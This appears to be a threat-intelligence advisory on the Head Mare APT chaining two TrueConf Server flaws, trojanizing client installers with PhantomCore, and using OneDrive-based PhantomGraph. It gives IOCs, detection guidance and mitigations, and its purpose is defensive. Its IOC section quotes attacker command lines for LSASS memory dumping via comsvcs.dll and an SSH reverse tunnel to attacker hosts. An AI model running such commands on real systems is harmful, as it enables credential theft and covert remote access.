Head Mare APT is exploiting vulnerabilities in an unpatched TrueConf server to deliver PhantomCore and PhantomGraph to video conference participants
Head Mare APT group exploited a chain of two vulnerabilities (KLCERT-26-057, KLCERT-26-058) in unpatched TrueConf Server instances to achieve unauthenticated remote code execution as SYSTEM. After gaining elevated privileges, attackers replaced the locale.php file with a web shell, then trojanized the TrueConf client installer to deliver the PhantomCore backdoor to all clients downloading it. A second backdoor, PhantomGraph, uses Microsoft OneDrive as C2 and splits its functionality across two service-installed DLLs to evade EDR detection.
- domainbright-deals[.]siteAttacker-controlled C2 domain in the Head Mare campaign.
- domaincosmetic-deals[.]storeAttacker-controlled C2 domain in the Head Mare campaign.
- domainflexish[.]shopAttacker-controlled C2 domain in the Head Mare campaign.
- domainmedia-hub[.]todayAttacker-controlled C2 domain in the Head Mare campaign.
- domainnova-stream[.]siteAttacker-controlled C2 domain in the Head Mare campaign.
- domainpenzadogshelter[.]siteAttacker-controlled domain used as C2 infrastructure in the Head Mare campaign.
- domainrinomobile[.]inkAttacker-controlled C2 domain in the Head Mare campaign.
- domaintrendy-market[.]siteAttacker-controlled C2 domain in the Head Mare campaign.
- domainurbanpixel[.]storeAttacker-controlled C2 domain in the Head Mare campaign.
- domainvks[.]gossopka[.]forumAttacker-controlled C2 domain in the Head Mare campaign.
- filenameC:\Windows\System32\inetsrv\graphi-refresh.datData file used by PhantomGraph on compromised systems.
- filenameC:\Windows\System32\inetsrv\share\input_*.txtInput command files used by PhantomGraph for command ingestion.
- filenameC:\Windows\System32\inetsrv\share\output_*.txtOutput result files used by PhantomGraph for command execution results.
- filenameC:\Windows\System32\inetsrv\SysExcSvc.dllPath where the PhantomGraph C2 module DLL was dropped on compromised systems.
- filenameC:\Windows\System32\inetsrv\SysReadSvc.dllPath where the PhantomGraph executor module DLL was dropped on compromised systems.
- filename/etc/systemd/system/omicluster.serviceLinux systemd service file for persistence of Head Mare ELF backdoor.
- filename/etc/systemd/system/schedul2-bin.serviceLinux systemd service file for persistence of Head Mare ELF backdoor.
- filename%LOCALAPPDATA%\TrueConf\Client\api-ms-win-crt-time-l1-1-0-2.dllPhantomCore DLL dropped alongside the legitimate TrueConf client via DLL sideloading.
- filename/omi/bin/omiclusterLinux binary used by Head Mare for persistence disguised as OMI cluster software.
- filename/opt/acronis/bin/schedul2-binLinux binary used by Head Mare for persistence disguised as Acronis software.
- filenameSysExcSvc.dllPhantomGraph C2 module responsible for receiving commands and transmitting execution results via Microsoft OneDrive; installed as a Windows service.
- filenameSysReadSvc.dllPhantomGraph executor module that reads commands from SysExcSvc.dll, executes them via batch files, and saves results; installed as a Windows service.
- filename%TEMP%\cmd_cmd_*.batBatch files created by PhantomGraph SysReadSvc module for command execution.
- filename/usr/lib64/libzvbi-tchain.so.2Linux shared library used by Head Mare for persistence.
- filename/var/tmp/cx2Linux temporary file used by Head Mare ELF backdoor.
- ip194[.]87[.]239[.]71IP address used for SSH connectivity in the campaign.
- ip194[.]87[.]93[.]153IP address used as the destination for an SSH reverse tunnel established by attackers for persistent C2 access.
- ip31[.]59[.]102[.]61Attacker-controlled IP address observed in the campaign.
- ip38[.]244[.]205[.]244Attacker-controlled IP address observed in the campaign.
- ip81[.]177[.]32[.]12Attacker-controlled IP address used in the campaign infrastructure.
- md50e4541c3153ec5ed01497f19cf4f63d0MD5 hash of a PhantomGraph SysExcSvc.dll variant.
- md50e79996d9483d1e44fea32b0a48c2c19MD5 hash of a PhantomCore file (doc.txt).
- md5129462164a7d52e9ea8560b60f0412c5MD5 hash of a PhantomCore DLL file (doc.txt).
- md512d4e8f5295f2ef7e0f9bfc0f4830939MD5 hash of a PhantomGraph SysExcSvc.dll variant.
- md52bb75c20e778eb5c416965bd4d4259b1MD5 hash of a trojanized TrueConf client installer (trueconf_windows_client_x64_[redacted].exe).
- md543f435c3c437bc879a2d7d4634f43494MD5 hash of an ELF backdoor used by Head Mare with GitHub C2.
- md5489f43be558b2679284ceabed7adc4f3MD5 hash of the PhantomGraph SysExcSvc.dll C2 module that communicates with Microsoft OneDrive.
- md54d27b4eb1c5dbb3d8160f29b8119523eMD5 hash of the web shell that replaced locale.php on the TrueConf server for remote control and subsequent payload delivery.
- md5748c9f8cb1065000616204935f96207fMD5 hash of the trojanized TrueConf client installer (trueconf_windows_update.exe) containing the PhantomCore backdoor, distributed from compromised servers.
- md57d4c81fcfb10a9000616254935f96107MD5 hash of a trojanized trueconf_windows_update.exe downloaded from a compromised server.
- md57f267006cac10f341c356b62fe493527MD5 hash of a PhantomGraph SysExcSvc.dll variant.
- md58fcc3e4ccbf1725d9989fb464abf3561MD5 hash of a PhantomCore file (usocacheddata.txt).
- md5aee9642b45b099cb7f3053b9b680b425MD5 hash of an ELF rootkit installed on TrueConf servers by Head Mare.
- md5b348642146ea34771e5785c5857950f5MD5 hash of a PhantomCore file (usocacheddata.txt).
- md5b3a6fee3307f1c26841fd5c603e2b013MD5 hash of a PhantomCore file (usocacheddata.txt).
- md5be696a408d62eea5af26d004bc7f0254MD5 hash of SysExcSvc.dll dropped to the TrueConf Server public JS directory.
- md5c3a2abe8756910f42582b04a44ea3514MD5 hash of an ELF backdoor used by Head Mare with GitHub C2.
- md5c5a460e4e68a088f6e51b2c6474642ecMD5 hash of the PhantomCore backdoor DLL (doc.txt), the primary implant delivered to client systems via the trojanized installer.
- md5c915cb6c2aeb863ee8479238e1644217MD5 hash of a PhantomCore file (doc.txt).
- md5dd1fd2b459b97b7d59375cb8383cd19aMD5 hash of the PhantomGraph SysReadSvc.dll executor module.
- md5ec0bf4a2186a88874e9f26f07cfeb532MD5 hash of a PhantomCore file (doc.txt).
- md5ee2861d5965e8730708cd1da8a93fa4cMD5 hash of a PhantomGraph SysExcSvc.dll variant.
- registry_keyHKEY_CURRENT_USER\Software\Classes\CLSID\{0340F119-A598-4ed9-B0AC-6F6A12D3E755}\InprocServer32Registry key used by PhantomCore for persistence; value set to the path of the malicious program file for autostart on boot.
- sha256198109590c9b918140180a7bb93b7f2253802d0a4a45c9b6c5e4cb802a81ecd8SHA256 hash of tc_webmgr.exe (httpd.exe) parent process that spawned SysExcSvc.dll creation on the TrueConf server.
Detection / Hunteropenrouter
What Happened
A hacking group called Head Mare found security flaws in TrueConf video conferencing software and used them to take full control of servers running outdated versions. Once inside, they replaced the legitimate TrueConf app installer with a malicious version that secretly installs spyware called PhantomCore. Anyone who downloaded the app from a compromised server would get infected. They also installed a second tool called PhantomGraph that uses Microsoft OneDrive to receive commands, making it harder to detect. The software vendor released fixes in June 2026, but organizations that have not updated are still at risk. Organizations should update their TrueConf servers immediately and verify that any downloaded client installers carry a valid digital signature.
Key Takeaways
- Head Mare APT exploited two unpatched TrueConf Server vulnerabilities (KLCERT-26-057, KLCERT-26-058) to achieve remote code execution as NT AUTHORITY\SYSTEM via port 4307/TCP
- Attackers replaced legitimate TrueConf client installers on the compromised server with trojanized versions containing the PhantomCore backdoor, creating a supply-chain delivery vector for all meeting participants
- PhantomGraph backdoor uses Microsoft OneDrive as C2 infrastructure and splits functionality across two DLLs (SysExcSvc.dll, SysReadSvc.dll) installed as Windows services to evade EDR detection
- Patches were released June 18, 2026 in TrueConf Server versions 5.3.9, 5.4.9, and 5.5.5; organizations running 5.3.X through 5.3.8, 5.4.X through 5.4.8, or 5.5.X through 5.5.4 are vulnerable
- Attackers performed LSASS memory dumping via comsvcs.dll and established SSH reverse tunnels for persistent C2 access
Affected Systems
- TrueConf Server versions 5.3.X through 5.3.8
- TrueConf Server versions 5.4.X through 5.4.8
- TrueConf Server versions 5.5.X through 5.5.4
- TrueConf Client (when downloaded from compromised server)
- Windows systems running TrueConf Server software
Vulnerabilities (CVEs)
| CVE | Product | Severity | Description |
|---|---|---|---|
| KLCERT-26-057 | TrueConf Server | High | Allows unauthenticated attackers to transmit and execute a malicious script on the TrueConf server via port 4307/TCP. |
| KLCERT-26-058 | TrueConf Server | High | Allows attackers to escape the isolated script execution environment and execute commands in the operating system context with SYSTEM privileges. |
Attack Chain
- Initial Access: Attackers connect to TrueConf Server on port 4307/TCP without prior authorization
- Exploitation: KLCERT-26-057 allows script execution in an isolated environment; KLCERT-26-058 escapes the sandbox to gain NT AUTHORITY\SYSTEM privileges
- Persistence: Attackers replace locale.php with a web shell and create a registry CLSID key for PhantomCore autostart
- Delivery: Web shell is used to replace the legitimate TrueConf client installer with a trojanized version containing PhantomCore
- Command and Control: PhantomGraph installed as two Windows services uses Microsoft OneDrive as C2; SSH reverse tunnels established to attacker IPs
- Credential Access: LSASS memory is dumped via comsvcs.dll for credential extraction
Detection Availability
- YARA Rules: Yes
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: Yes
- Platforms: Kaspersky ICS CERT, Kaspersky KEDR Expert, Kaspersky Managed Detection and Response, Kaspersky SIEM
The article provides seven YARA rules for detecting PhantomCore, PhantomGraph, the trojanized TrueConf installer, the locale.php web shell, an ELF rootkit, and an ELF backdoor with GitHub C2. Kaspersky KEDR Expert and MDR detection rules are described by name (e.g., unusual_php_file_creation_from_trueconf_process, unsigned_trueconf_installer). Kaspersky SIEM rules are referenced by rule IDs (R405_07, R233_04, R262). Custom detection logic using Windows Security event IDs 4688, 4663, 4657, 4697 and Sysmon events 1, 7, 11, 13 is also described.
Detection Engineering Assessment
| Dimension | Rating | Rationale |
|---|---|---|
| EDR Visibility | High | The attack involves file creation by TrueConf processes, unsigned installer execution, service creation, registry modification, LSASS memory access, and process spawning from the TrueConf update process. All of these are visible to EDR tools with standard process, file, and registry telemetry. |
| Network Visibility | Medium | The initial exploitation targets port 4307/TCP on the TrueConf server. SSH reverse tunnels to attacker IPs on port 443 are detectable via network flow analysis. PhantomGraph C2 over Microsoft OneDrive uses legitimate cloud infrastructure, making network-level detection harder without endpoint visibility. |
| Detection Difficulty | Moderate | The attack has several distinctive indicators visible at the endpoint level (unsigned TrueConf installers, web shell file replacement, specific service names, specific registry CLSID). However, the OneDrive-based C2 and SSH reverse tunneling over port 443 blend with legitimate traffic, requiring correlation across endpoint and network telemetry. |
Required Log Sources
- Windows Security Event Log (events 4688, 4663, 4657, 4697)
- Sysmon events (1, 7, 11, 13)
- TrueConf Server application logs
- Network flow data for port 4307/TCP and SSH tunnel detection
- EDR process creation and file modification telemetry
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for file creation events where a TrueConf Server process writes PHP files to the public JS directory, which may indicate web shell deployment. | EDR file creation events with process name matching tc_server.exe or tc_webmgr.exe and file extension .php | Persistence | Low — legitimate TrueConf updates should not create new PHP files in the public JS directory. |
| Consider hunting for TrueConf client installer executables that lack a valid digital signature, which may indicate a trojanized installer distributed from a compromised server. | EDR file creation and signature validation events for trueconf_windows_update.exe and trueconf_windows_client_x64.exe | Delivery | Low — legitimate TrueConf installers are signed; unsigned installers are suspicious. |
| Consider hunting for Windows service creation events with service names SysExcSvc or SysReadSvc, or services configured to execute batch files from temporary directories. | Windows Security event 4697 and Sysmon event 13 for service installation | Persistence | Low — these service names are not associated with legitimate software. |
| Consider hunting for registry modifications under HKCU\Software\Classes\CLSID that set InprocServer32 values, which may indicate COM hijacking for persistence as used by PhantomCore. | Windows Security event 4657 and Sysmon event 13 for registry value modifications | Persistence | Medium — some legitimate software registers COM objects under HKCU, so correlation with known good is needed. |
| Consider hunting for process creation events where trueconf_windows_update.exe spawns child processes, which may indicate exploitation of the trojanized installer for payload execution. | EDR process creation events and Windows Security event 4688 with parent process matching trueconf_windows_update.exe | Execution | Low — the update process should not spawn arbitrary child executables. |
Control Gaps
- Network-based detection alone would miss PhantomGraph C2 traffic over Microsoft OneDrive since it uses legitimate cloud infrastructure.
- Signature-based AV may miss the web shell if it uses obfuscated PHP that does not match known web shell signatures.
- Application-level logging on TrueConf Server is required to detect the initial exploitation via port 4307/TCP; standard network firewalls may not inspect the application-layer payload.
- DLL sideloading via api-ms-win-crt-time-l1-1-0-2.dll in the TrueConf Client directory may bypass application control if the legitimate TrueConf executable is allowlisted.
Key Behavioral Indicators
- File creation of PHP files by tc_server.exe or tc_webmgr.exe processes in the TrueConf public JS directory
- Execution of trueconf_windows_update.exe without a valid digital signature
- Process tree where Explorer.exe spawns trueconf_windows_update.exe which spawns trueconf_windows_update.tmp
- Service creation with names SysExcSvc or SysReadSvc configured to run from C:\Windows\System32\inetsrv\
- Registry value creation under HKCU\Software\Classes\CLSID{0340F119-A598-4ed9-B0AC-6F6A12D3E755}\InprocServer32
- rundll32.exe loading comsvcs.dll for LSASS memory dumping
- SSH process execution with reverse tunnel arguments (-f -N -R) connecting to external IPs on port 443
- Batch file creation in %TEMP% matching pattern cmd_cmd_*.bat by SysReadSvc service
False Positive Assessment
Low — The attack involves specific indicators such as unsigned TrueConf installers, PHP file creation by TrueConf server processes, non-standard service names (SysExcSvc, SysReadSvc), and a specific CLSID registry key. These are unlikely to appear in normal TrueConf operations. The OneDrive-based C2 traffic may generate false positives if hunting for general OneDrive API usage without correlating with endpoint process context.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting. Update TrueConf Server to version 5.3.9, 5.4.9, or 5.5.5 immediately if running any affected version.
- Consider verifying that all TrueConf client installers downloaded from your organization's server or partner servers carry a valid TrueConf digital signature; the trojanized installers lack valid signatures.
- If you suspect compromise, consider checking for the presence of the locale.php web shell by comparing its MD5 hash against 4d27b4eb1c5dbb3d8160f29b8119523e.
- Consider reviewing TrueConf Server event logs for evidence of deletion or tampering, as attackers deleted log entries to cover tracks.
Infrastructure Hardening
- Evaluate whether port 4307/TCP on TrueConf servers needs to be exposed to untrusted networks; consider restricting access to authenticated internal users only.
- If applicable, consider implementing network segmentation to isolate TrueConf servers from general corporate network segments.
- Consider deploying application-level monitoring for TrueConf Server processes to detect anomalous file creation or script execution patterns.
- Evaluate whether your organization's EDR covers TrueConf server endpoints with specific detection rules for unsigned installer execution and PHP file creation by server processes.
User Protection
- Consider alerting employees who may have connected to external TrueConf servers for business meetings that they may have downloaded trojanized client installers.
- If supported by your endpoint tooling, consider blocking execution of TrueConf client installers that lack a valid digital signature.
- Consider scanning endpoints for the PhantomCore persistence registry key under HKCU\Software\Classes\CLSID{0340F119-A598-4ed9-B0AC-6F6A12D3E755}.
- Evaluate whether your EDR can detect and alert on LSASS memory access via comsvcs.dll and rundll32.exe.
Security Awareness
- Consider incorporating guidance into existing awareness programs about verifying the authenticity of software installers downloaded from video conferencing platforms, even those used by trusted business partners.
- Consider reminding employees that connecting to external or partner-hosted conferencing servers carries supply-chain risk if client software is downloaded from those servers.
- If applicable, consider advising employees to download TrueConf client software only from the vendor's official website rather than from meeting server links.
MITRE ATT&CK Mapping
Initial Access
Persistence
Stealth
Credential Access
Lateral Movement
Command and Control
Additional IOCs
- Ips:
194[.]87[.]239[.]71- IP address used for SSH connectivity in the campaign.38[.]244[.]205[.]244- Attacker-controlled IP address observed in the campaign.31[.]59[.]102[.]61- Attacker-controlled IP address observed in the campaign.
- Domains:
trendy-market[.]site- Attacker-controlled C2 domain in the Head Mare campaign.bright-deals[.]site- Attacker-controlled C2 domain in the Head Mare campaign.nova-stream[.]site- Attacker-controlled C2 domain in the Head Mare campaign.rinomobile[.]ink- Attacker-controlled C2 domain in the Head Mare campaign.urbanpixel[.]store- Attacker-controlled C2 domain in the Head Mare campaign.flexish[.]shop- Attacker-controlled C2 domain in the Head Mare campaign.media-hub[.]today- Attacker-controlled C2 domain in the Head Mare campaign.cosmetic-deals[.]store- Attacker-controlled C2 domain in the Head Mare campaign.vks[.]gossopka[.]forum- Attacker-controlled C2 domain in the Head Mare campaign.
- File Hashes:
129462164a7d52e9ea8560b60f0412c5(MD5) - MD5 hash of a PhantomCore DLL file (doc.txt).ec0bf4a2186a88874e9f26f07cfeb532(MD5) - MD5 hash of a PhantomCore file (doc.txt).b348642146ea34771e5785c5857950f5(MD5) - MD5 hash of a PhantomCore file (usocacheddata.txt).c915cb6c2aeb863ee8479238e1644217(MD5) - MD5 hash of a PhantomCore file (doc.txt).0e79996d9483d1e44fea32b0a48c2c19(MD5) - MD5 hash of a PhantomCore file (doc.txt).2bb75c20e778eb5c416965bd4d4259b1(MD5) - MD5 hash of a trojanized TrueConf client installer (trueconf_windows_client_x64_[redacted].exe).b3a6fee3307f1c26841fd5c603e2b013(MD5) - MD5 hash of a PhantomCore file (usocacheddata.txt).8fcc3e4ccbf1725d9989fb464abf3561(MD5) - MD5 hash of a PhantomCore file (usocacheddata.txt).dd1fd2b459b97b7d59375cb8383cd19a(MD5) - MD5 hash of the PhantomGraph SysReadSvc.dll executor module.0e4541c3153ec5ed01497f19cf4f63d0(MD5) - MD5 hash of a PhantomGraph SysExcSvc.dll variant.12d4e8f5295f2ef7e0f9bfc0f4830939(MD5) - MD5 hash of a PhantomGraph SysExcSvc.dll variant.7f267006cac10f341c356b62fe493527(MD5) - MD5 hash of a PhantomGraph SysExcSvc.dll variant.ee2861d5965e8730708cd1da8a93fa4c(MD5) - MD5 hash of a PhantomGraph SysExcSvc.dll variant.c3a2abe8756910f42582b04a44ea3514(MD5) - MD5 hash of an ELF backdoor used by Head Mare with GitHub C2.43f435c3c437bc879a2d7d4634f43494(MD5) - MD5 hash of an ELF backdoor used by Head Mare with GitHub C2.aee9642b45b099cb7f3053b9b680b425(MD5) - MD5 hash of an ELF rootkit installed on TrueConf servers by Head Mare.be696a408d62eea5af26d004bc7f0254(MD5) - MD5 hash of SysExcSvc.dll dropped to the TrueConf Server public JS directory.7d4c81fcfb10a9000616254935f96107(MD5) - MD5 hash of a trojanized trueconf_windows_update.exe downloaded from a compromised server.15e366ed0bd51677580900b1f591761(MD5) - MD5 hash of trueconf_windows_update.tmp extracted from the trojanized installer, detected as PDM:Trojan.Win32.Generic.198109590c9b918140180a7bb93b7f2253802d0a4a45c9b6c5e4cb802a81ecd8(SHA256) - SHA256 hash of tc_webmgr.exe (httpd.exe) parent process that spawned SysExcSvc.dll creation on the TrueConf server.
- File Paths:
C:\Windows\System32\inetsrv\SysExcSvc.dll- Path where the PhantomGraph C2 module DLL was dropped on compromised systems.C:\Windows\System32\inetsrv\SysReadSvc.dll- Path where the PhantomGraph executor module DLL was dropped on compromised systems.C:\Windows\System32\inetsrv\graphi-refresh.dat- Data file used by PhantomGraph on compromised systems.C:\Windows\System32\inetsrv\share\input_*.txt- Input command files used by PhantomGraph for command ingestion.C:\Windows\System32\inetsrv\share\output_*.txt- Output result files used by PhantomGraph for command execution results.%TEMP%\cmd_cmd_*.bat- Batch files created by PhantomGraph SysReadSvc module for command execution.%LOCALAPPDATA%\TrueConf\Client\api-ms-win-crt-time-l1-1-0-2.dll- PhantomCore DLL dropped alongside the legitimate TrueConf client via DLL sideloading./etc/systemd/system/omicluster.service- Linux systemd service file for persistence of Head Mare ELF backdoor./etc/systemd/system/schedul2-bin.service- Linux systemd service file for persistence of Head Mare ELF backdoor./opt/acronis/bin/schedul2-bin- Linux binary used by Head Mare for persistence disguised as Acronis software./omi/bin/omicluster- Linux binary used by Head Mare for persistence disguised as OMI cluster software./usr/lib64/libzvbi-tchain.so.2- Linux shared library used by Head Mare for persistence./var/tmp/cx2- Linux temporary file used by Head Mare ELF backdoor.
- Command Lines:
- Purpose: Dump LSASS process memory for credential extraction | Tools:
cmd.exe,rundll32.exe,comsvcs.dll| Stage: Credential Access |rundll32.exe c:\windows\system32\comsvcs.dll - Purpose: Establish SSH reverse tunnel for persistent C2 access to attacker infrastructure | Tools:
ssh| Stage: Command and Control |ssh -o StrictHostKeyChecking=no -f -N -R <port> -p 443 - Purpose: Install PhantomGraph DLLs as Windows services for persistence | Tools:
powershell.exe| Stage: Persistence - Purpose: Execute batch file commands via cmd for PhantomGraph command execution | Tools:
cmd.exe| Stage: Execution |cmd.exe /c cmd /c ""<temp_path>\cmd_cmd_*.bat""
- Purpose: Dump LSASS process memory for credential extraction | Tools:
- Other:
SysExcSvc- Windows service name registered by PhantomGraph for its C2 module.SysReadSvc- Windows service name registered by PhantomGraph for its executor module.
Related
- The APT group Head Mare exploits vulnerabilities in an unpatched TrueConf server to deliver PhantomCore and PhantomGraph malware to video conferencing participants·5
- CISA Adds Two Known Exploited Vulnerabilities to Catalog (CVE-2026-72529, CVE-2026-72530)·1
- wp2shell hits WordPress: detecting pre-auth RCE from plugin drop to command execution·1